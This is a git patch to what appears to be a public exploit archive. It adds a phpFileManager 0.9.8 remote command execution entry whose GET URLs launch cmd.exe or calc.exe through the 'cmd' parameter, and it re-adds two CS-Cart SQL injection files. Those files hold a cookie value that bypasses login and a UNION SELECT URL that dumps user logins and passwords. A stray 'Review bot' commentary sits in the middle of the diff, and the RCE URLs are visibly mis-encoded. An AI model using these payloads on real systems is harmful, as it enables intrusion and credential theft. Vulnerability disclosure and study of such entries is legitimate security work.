From 7c8d57574c6cf68dc869014777237c865cdbddbc Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 29 Jul 2015 05:02:25 +0000 Subject: [PATCH] DB: 2015-07-29 1 new exploits --- files.csv | 9 ++- platforms/php/webapps/37709.txt | 115 ++++++++++++++++++++++++++++ platforms/php/webapps/6352.txt | 128 ++++++++++++++++---------------- platforms/php/webapps/8184.txt | 34 ++++----- 4 files changed, 201 insertions(+), 85 deletions(-) create mode 100755 platforms/php/webapps/37709.txt
diff --git a/files.csv b/files.csv
index 8e961b36e..4f0fc6243 100755
--- a/files.csv
+++ b/files.csv
@@ -5935,7 +5935,7 @@ id,file,description,date,author,platform,type,port
 6349,platforms/php/webapps/6349.txt,"Reciprocal Links Manager 1.1 (site) SQL Injection Vulnerability",2008-09-02,"Hussin X",php,webapps,0
 6350,platforms/php/webapps/6350.txt,"AJ HYIP ACME (comment.php artid) SQL Injection Vulnerability",2008-09-02,"security fears team",php,webapps,0
 6351,platforms/php/webapps/6351.txt,"AJ HYIP ACME (readarticle.php artid) SQL Injection Vulnerability",2008-09-02,InjEctOr5,php,webapps,0
-6352,platforms/php/webapps/6352.txt,"CS-Cart <= 1.3.5 (Auth Bypass) SQL Injection Vulnerability",2008-09-02,"GulfTech Security",php,webapps,0
+6352,platforms/php/webapps/6352.txt,"CS-Cart <= 1.3.5 - (Auth Bypass) SQL Injection Vulnerability",2008-09-02,"GulfTech Security",php,webapps,0
 6353,platforms/windows/dos/6353.txt,"Google Chrome Browser 0.2.149.27 - DoS Vulnerability",2008-09-03,"Rishi Narang",windows,dos,0
 6354,platforms/php/webapps/6354.txt,"Spice Classifieds (cat_path) Remote SQL Injection Vulnerability",2008-09-03,InjEctOr5,php,webapps,0
 6355,platforms/windows/remote/6355.txt,"Google Chrome Browser 0.2.149.27 Automatic File Download Exploit",2008-09-03,nerex,windows,remote,0
@@ -7700,7 +7700,7 @@ id,file,description,date,author,platform,type,port
 8181,platforms/php/webapps/8181.c,"PHP Director <= 0.21 (sql into outfile) eval() Injection Exploit",2009-03-09,StAkeR,php,webapps,0
 8182,platforms/php/webapps/8182.txt,"PHPRecipeBook 2.24 (base_id) Remote SQL Injection Vulnerability",2009-03-09,d3b4g,php,webapps,0
 8183,platforms/php/webapps/8183.txt,"woltlab burning board 3.0.x - Multiple Vulnerabilities",2009-03-09,StAkeR,php,webapps,0
-8184,platforms/php/webapps/8184.txt,"CS-Cart 2.0.0 Beta 3 (product_id) SQL Injection Vulnerability",2009-03-09,netsoul,php,webapps,0
+8184,platforms/php/webapps/8184.txt,"CS-Cart 2.0.0 Beta 3 - (product_id) SQL Injection Vulnerability",2009-03-09,netsoul,php,webapps,0
 8185,platforms/php/webapps/8185.txt,"phpCommunity 2.1.8 (SQL/DT/XSS) Multiple Vulnerabilities",2009-03-09,"Salvatore Fresta",php,webapps,0
 8186,platforms/php/webapps/8186.txt,"PHP-Fusion Mod Book Panel (bookid) SQL Injection Vulnerability",2009-03-09,elusiven,php,webapps,0
 8187,platforms/hardware/dos/8187.sh,"Addonics NAS Adapter Post-Auth Denial of Service Exploit",2009-03-09,h00die,hardware,dos,0
@@ -24156,7 +24156,7 @@ id,file,description,date,author,platform,type,port
 27027,platforms/php/webapps/27027.txt,"Jax Calendar 1.34 Jax_calendar.PHP SQL Injection Vulnerability",2005-12-26,r0t3d3Vil,php,webapps,0
 27028,platforms/php/webapps/27028.txt,"LogicBill 1.0 - Multiple SQL Injection Vulnerabilities",2005-12-25,r0t3d3Vil,php,webapps,0
 27029,platforms/php/webapps/27029.txt,"EZ Invoice Inc. EZI 2.0 Invoices.PHP SQL Injection Vulnerability",2005-12-25,r0t3d3Vil,php,webapps,0
-27030,platforms/php/webapps/27030.txt,"CS-Cart Multiple SQL Injection Vulnerabilities",2005-12-25,r0t3d3Vil,php,webapps,0
+27030,platforms/php/webapps/27030.txt,"CS-Cart - Multiple SQL Injection Vulnerabilities",2005-12-25,r0t3d3Vil,php,webapps,0
 27031,platforms/linux/dos/27031.c,"Linux Kernel 2.6.x - SET_MEMPOLICY Local Denial of Service Vulnerability",2006-01-04,"Doug Chapman",linux,dos,0
 27032,platforms/linux/remote/27032.txt,"Hylafax 4.1/4.2 - Multiple Scripts Remote Command Execution Vulnerability",2006-01-05,"Patrice Fournier",linux,remote,0
 27033,platforms/php/webapps/27033.txt,"Foro Domus 2.10 - Multiple Input Validation Vulnerabilities",2006-01-06,"Aliaksandr Hartsuyeu",php,webapps,0
@@ -32534,7 +32534,7 @@ id,file,description,date,author,platform,type,port
 36090,platforms/php/webapps/36090.txt,"ClickCMS Denial of Service Vulnerability and CAPTCHA Bypass Vulnerability",2011-08-29,MustLive,php,webapps,0
 36091,platforms/php/webapps/36091.txt,"IBM Open Admin Tool 2.71 Multiple Cross Site Scripting Vulnerabilities",2011-08-30,"Sumit Kumar Soni",php,webapps,0
 36092,platforms/windows/dos/36092.pl,"MapServer <= 6.0 Map File Double Free Remote Denial of Service Vulnerability",2011-08-30,rouault,windows,dos,0
-36093,platforms/php/webapps/36093.txt,"CS-Cart 2.2.1 'products.php' SQL Injection Vulnerability",2011-08-30,Net.Edit0r,php,webapps,0
+36093,platforms/php/webapps/36093.txt,"CS-Cart 2.2.1 - 'products.php' SQL Injection Vulnerability",2011-08-30,Net.Edit0r,php,webapps,0
 36094,platforms/php/webapps/36094.txt,"TinyWebGallery 1.8.4 Local File Include and SQL Injection Vulnerabilities",2011-08-31,KedAns-Dz,php,webapps,0
 36095,platforms/php/webapps/36095.txt,"Serendipity 1.5.1 'research_display.php' SQL Injection Vulnerability",2011-08-31,The_Exploited,php,webapps,0
 36096,platforms/php/webapps/36096.txt,"Web Professional 'default.php' SQL Injection Vulnerability",2011-08-31,The_Exploited,php,webapps,0
@@ -34036,3 +34036,4 @@ id,file,description,date,author,platform,type,port
 37705,platforms/php/webapps/37705.txt,"WordPress Unite Gallery Lite Plugin 1.4.6 - Multiple Vulnerabilities",2015-07-27,"Nitin Venkatesh",php,webapps,80
 37707,platforms/php/webapps/37707.txt,"WordPress Count Per Day Plugin 3.4 - SQL Injection",2015-07-27,"High-Tech Bridge SA",php,webapps,80
 37708,platforms/php/webapps/37708.txt,"Xceedium Xsuite - Multiple Vulnerabilities",2015-07-27,modzero,php,webapps,0
+37709,platforms/php/webapps/37709.txt,"phpFileManager 0.9.8 - Remote Command Execution Vulnerability",2015-07-28,"John Page",php,webapps,0
diff --git a/platforms/php/webapps/37709.txt b/platforms/php/webapps/37709.txt
new file mode 100755
index 000000000..db026400c
--- /dev/null
+++ b/platforms/php/webapps/37709.txt 
@@ -0,0 +1,115 @@
+# Exploit Title: Remote Command Execution
+# Google Dork: intitle: PHP Remote Command Execution
+# Date: 2015-07-28
+# Exploit Author: John Page ( hyp3rlinx )
+# Website: hyp3rlinx.altervista.org
+# Vendor Homepage: phpfm.sourceforge.net
+# Software Link: phpfm.sourceforge.net
+# Version: 0.9.8
+# Tested on: windows 7 SP1
+# Category: Webapps
+
+
+
+Vendor:
+================================
+phpfm.sourceforge.net
+
+
+
+Product:
+================================
+phpFileManager version 0.9.8
+
+
+Vulnerability Type:
+========================
+Remote Command Execution
+
+
+CVE Reference:
+==============
+N/A
+
+
+
+Advisory Information:
+=======================================================
+Remote Command Execution Vulnerability
+
+
+
+
+Vulnerability Details:
+=====================
+PHPFileManager is vulnerable to remote command execution
+and will call operating system commands via GET requests
+from a victims browser. By getting the victim to click our malicious link
+or visit our malicious website.
+
+
+
+
+Exploit code(s):
+===============
+
+
+Remote Command Execution:
+-------------------------
+
+1- call Windows cmd.exe
+
+https://localhost/phpFileManager-0.9.8/index.php?action=6¤t_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=c%3A\Windows\system32\cmd.exe
+
+
+2- Run Windows calc.exe
+
+https://localhost/phpFileManager-0.9.8/index.php?action=6¤t_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=c%3A\Windows\system32\calc.exe
+
+
+
+
+Disclosure Timeline:
+=========================================================
+
+Vendor Notification: NA
+July 28, 2015 : Public Disclosure
+
+
+
+Severity Level:
+=========================================================
+High
+
+
+
+Description:
+==========================================================
+
+
+Request Method(s): [+] GET
+
+
+Vulnerable Product: [+] phpFileManager 0.9.8
+
+
+Vulnerable Parameter(s): [+] 'cmd'= [OS command]
+
+
+Affected Area(s): [+] Operating System
+
+
+===========================================================
+
+[+] Disclaimer
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and that due
+credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit is given to
+the author.
+The author is not responsible for any misuse of the information contained
+herein and prohibits any malicious use of all security related information
+or exploits by the author or elsewhere.
+
+
+by hyp3rlinx
diff --git a/platforms/php/webapps/6352.txt b/platforms/php/webapps/6352.txt
index 1eefccbdc..e581f4ecc 100755
--- a/platforms/php/webapps/6352.txt
+++ b/platforms/php/webapps/6352.txt
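Review bot: The two proof-of-concept URLs in the exploit section are mis-encoded: `index.php?action=6¤t_dir=C:/xampp/...` reads as the currency-sign character followed by `t_dir`, which looks like `&current_dir=` having been decoded as the `&curren;` HTML entity somewhere on import, so the PoC will not reproduce as pasted and should be checked against the author's original and restored to `index.php?action=6&current_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=...` before this entry is published. The write-up never says whether `action=6` is reachable without authentication; if it is phpFileManager's own command-execution screen, then what is described under Vulnerability Details ("getting the victim to click our malicious link") is a cross-site request forgery against a state-changing GET handler with no anti-CSRF token, and `Vulnerability Type` / `Vulnerability Details` should say so rather than presenting it as command injection. `Vendor Notification: NA` with same-day public disclosure should be flagged in the entry as an unnotified zero-day, and `# Google Dork: intitle: PHP Remote Command Execution` is not a usable dork and should be dropped or replaced with one that actually fingerprints phpFileManager. This hunk is the entire new file.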
@@ -1,64 +1,64 @@
-##########################################################
-# GulfTech Security Research September 02, 2008
-##########################################################
-# Vendor : CS-Cart.com
-# URL : http://www.cs-cart.com/
-# Version : CS-Cart <= 1.3.5
-# Risk : SQL Injection
-##########################################################
-
-
-Description:
-CS-Cart Cart is a full featured online ecommerce application written
-in php that allows users to build, run and promote an online store.
-There is unfortunately a fairly serious SQL Injection issue within
-CS-Cart that can be used to easily take over user and administrator
-accounts, as well as used to retrieve arbitrary data from the database.
-The CS-Cart team have released an updated version of CS-Cart to resolve
-this issue, and users should upgrade as soon as possible.
-
-
-SQL Injection:
-There is a fairly serious SQL Injection issue in CS-Cart that, as
-mentioned before, allows attackers to easily bypass authentication, or
-retrieve arbitrary data from the underlying database. The vulnerable
-code can be found in /core/user.php
-
-if (fn_get_cookie(AREA_NAME . '_user_id')) {
- $udata = db_get_row("SELECT user_id, user_type, tax_exempt, last_login, membership_status,
- membership_id FROM $db_tables[users] WHERE user_id='".fn_get_cookie(AREA_NAME . '_user_id')."'
- AND password='".fn_get_cookie(AREA_NAME . '_password')."'");
- fn_define('LOGGED_VIA_COOKIE', true);
-}
-
-At the time of discovering this issue the fn_get_cookie() function did
-nothing more than check if the specified cookie value was present, if
-it was then it returned the value. This of course allowed for an SQL
-Injection issue since an attacker can easily specify cookie data.
-
-cs_cookies[customer_user_id]=1'/*;
-
-For example an attacker could specify a cookie like the one shown above
-and successfully log in as the customer with the id of 1 without ever
-actually authenticating. Alternatively just about any data can be
-retrieved via this method also since the injection happens right in the
-middle of a select statement.
-
-
-
-Solution:
-An updated version of CS-Cart has been released to address these issues
-and users can upgrade by visiting the CS-Cart website.
-
-
-
-Credits:
-James Bercegay of the GulfTech Security Research Team
-
-
-
-Related Info:
-The original advisory can be found at the following location
-http://www.gulftech.org/?node=research&article_id=00128-09022008
-
-# milw0rm.com [2008-09-02]
+##########################################################
+# GulfTech Security Research September 02, 2008
+##########################################################
+# Vendor : CS-Cart.com
+# URL : http://www.cs-cart.com/
+# Version : CS-Cart <= 1.3.5
+# Risk : SQL Injection
+##########################################################
+
+
+Description:
+CS-Cart Cart is a full featured online ecommerce application written
+in php that allows users to build, run and promote an online store.
+There is unfortunately a fairly serious SQL Injection issue within
+CS-Cart that can be used to easily take over user and administrator
+accounts, as well as used to retrieve arbitrary data from the database.
+The CS-Cart team have released an updated version of CS-Cart to resolve
+this issue, and users should upgrade as soon as possible.
+
+
+SQL Injection:
+There is a fairly serious SQL Injection issue in CS-Cart that, as
+mentioned before, allows attackers to easily bypass authentication, or
+retrieve arbitrary data from the underlying database. The vulnerable
+code can be found in /core/user.php
+
+if (fn_get_cookie(AREA_NAME . '_user_id')) {
+ $udata = db_get_row("SELECT user_id, user_type, tax_exempt, last_login, membership_status,
+ membership_id FROM $db_tables[users] WHERE user_id='".fn_get_cookie(AREA_NAME . '_user_id')."'
+ AND password='".fn_get_cookie(AREA_NAME . '_password')."'");
+ fn_define('LOGGED_VIA_COOKIE', true);
+}
+
+At the time of discovering this issue the fn_get_cookie() function did
+nothing more than check if the specified cookie value was present, if
+it was then it returned the value. This of course allowed for an SQL
+Injection issue since an attacker can easily specify cookie data.
+
+cs_cookies[customer_user_id]=1'/*;
+
+For example an attacker could specify a cookie like the one shown above
+and successfully log in as the customer with the id of 1 without ever
+actually authenticating. Alternatively just about any data can be
+retrieved via this method also since the injection happens right in the
+middle of a select statement.
+
+
+
+Solution:
+An updated version of CS-Cart has been released to address these issues
+and users can upgrade by visiting the CS-Cart website.
+
+
+
+Credits:
+James Bercegay of the GulfTech Security Research Team
+
+
+
+Related Info:
+The original advisory can be found at the following location
+http://www.gulftech.org/?node=research&article_id=00128-09022008
+
+# milw0rm.com [2008-09-02]
diff --git a/platforms/php/webapps/8184.txt b/platforms/php/webapps/8184.txt
index e2303716d..999b6df4e 100755
--- a/platforms/php/webapps/8184.txt
+++ b/platforms/php/webapps/8184.txt
@@ -1,17 +1,17 @@
-CS-Cart 2.0.0 Beta 3 (dispatch) SQL Injection Vulnerability
-Provider: www.cs-cart.com
-Discovered by netsoul
-Greetz: m1cr0n, IvanKalet, blackfalcon, str0ke
-Contact: netsoul2[at]gmail.com
-ALTO PARANA - PARAGUAY
-Ñane mba'e teete
-#####################################################
-
-Exploit:
-
-http://cs-cart cms/[path]/index.php?dispatch=products.view&product_id=289' UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,concat(user_login,0x3a,password),0,0 from cscart_users/*
-
-
-#####################################################
-
-# milw0rm.com [2009-03-09]
+CS-Cart 2.0.0 Beta 3 (dispatch) SQL Injection Vulnerability
+Provider: www.cs-cart.com
+Discovered by netsoul
+Greetz: m1cr0n, IvanKalet, blackfalcon, str0ke
+Contact: netsoul2[at]gmail.com
+ALTO PARANA - PARAGUAY
+Ñane mba'e teete
+#####################################################
+
+Exploit:
+
+http://cs-cart cms/[path]/index.php?dispatch=products.view&product_id=289' UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,concat(user_login,0x3a,password),0,0 from cscart_users/*
+
+
+#####################################################
+
+# milw0rm.com [2009-03-09]